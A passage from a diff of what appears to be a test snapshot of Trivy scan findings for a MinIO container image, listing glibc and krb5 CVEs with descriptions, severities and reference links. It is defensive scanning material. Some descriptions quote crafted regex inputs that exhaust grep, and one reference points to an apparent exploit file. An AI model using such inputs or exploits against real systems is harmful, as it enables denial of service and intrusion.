"URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, ], "severity": "HIGH", @@ -60602,564 +60924,653 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libk5crypto3", + "id": "CVE-2010-4756", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "http://cxib.net/stuff/glob-0day.c", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "http://securityreason.com/exploitalert/9223", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5-3", + "id": "CVE-2018-20796", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "http://www.securityfocus.com/bid/107160", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010022", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "glibc: stack guard protection bypass", + "references": [ { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://ubuntu.com/security/CVE-2019-1010022", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010023", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", + "references": [ + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "http://www.securityfocus.com/bid/109167", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://ubuntu.com/security/CVE-2019-1010023", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5-3", + "id": "CVE-2019-1010024", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "glibc: ASLR bypass using cache of thread stack and heap", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "http://www.securityfocus.com/bid/109162", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + }, + { + "type": "URL", + "value": "https://support.f5.com/csp/article/K06046097", + }, + { + "type": "URL", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/CVE-2019-1010024", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5support0", + "id": "CVE-2019-1010025", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "glibc: information disclosure of heap addresses of pthread_created thread", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://ubuntu.com/security/CVE-2019-1010025", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "references": [ { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2.31-13+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5support0", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", - ], - }, - "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": 